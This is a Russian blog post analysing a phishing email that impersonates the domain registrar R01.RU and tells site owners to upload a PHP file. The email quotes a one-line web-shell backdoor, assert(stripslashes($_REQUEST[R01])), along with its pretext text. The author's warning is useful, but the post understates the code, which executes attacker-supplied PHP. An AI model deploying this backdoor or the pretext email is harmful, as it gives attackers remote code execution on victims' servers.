Писатель, маркетолог, дизайнер, психолог

Социальная инженерия в действии

Социальная инженерия в действииПолучаю письмо. Тут надо заметить, что письма у меня смотрятся хоть и не через браузер, но почтовый клиент также показывает письма в HTML формате и не показывает реальный адрес отправителя (по-умолчанию). Поэтому ухищрения кульных хацкеров не были видны как на ладони (реальный адрес отправителя письма был info@r01l.ru — одна лишняя буква) и доходить до схемы «взлома» пришлось своим умом, анализируя присланное письмо.

Отправитель: "R01.RU"
Тема: Необходима активация домена [один из моих доменов]

Текст:

Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом [один из моих доменов] осуществляется лицом, указанным в качестве его администратора.Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7offau12fn0f83f.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех рабочих дней с момента получения настоящего письма и находиться на сервере до 28 декабря 2016 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
© АО "Регистратор Р01"
8-800-775-37-77,
8-495-616-2747


Что бросается в глаза?

То, что просят создать php-файл. Для проверки обычно достаточно и txt-файла.
Разберем код.
assert — это вывод проверки утверждения. По сути выведет на экран переданную инфу.
stripslashes — удаляет экранирование символов
остается $_REQUEST[R01] — вместо R01 могут написать что угодно. Это то, что передается php-йфалу через POST или GET запрос. И здесь не видно никакой защиты. Получается, что это простой незащищенный файл, который подвержен большинству уязвимостей, через обращение в переменной R01.

Узнал, что аналогичные письма приходят и от имени якобы РосКомНадзора :)

Т.е. цель «хакеров» — не дискриминация определенного сервиса, а временное получение доступа к сайтам.
Зачем?
Отжать домен таким образом не получится.
Удалять файлы обычно бесполезно — есть резервные копии.
Глумиться над сайтами, заменяя картинки — ребячество.
Получить секретную информацию — вряд ли получится, т.к. админ, который на это пойдет, вряд ли будет управлять крупным магазином.
Учитывая волну подобных писем — это не захват определенного сайта.
Остается одно — создание мусорных рекламных сайтов в папках на временно «захваченных» доменах.





0
0
См. также:

Комментарии

Сайт не хранит персональных данных!


Ваше имя:
Ваш вопрос или комментарий:
Жирный
Цитата
: )
Введите код:

Закрыть


Добавьте в соц. сети:

© 2013—2018, Влад Мерк
Почта: 13i [гав] list.ru
Контакты
Работает на CMS «Движок»
Индекс цитирования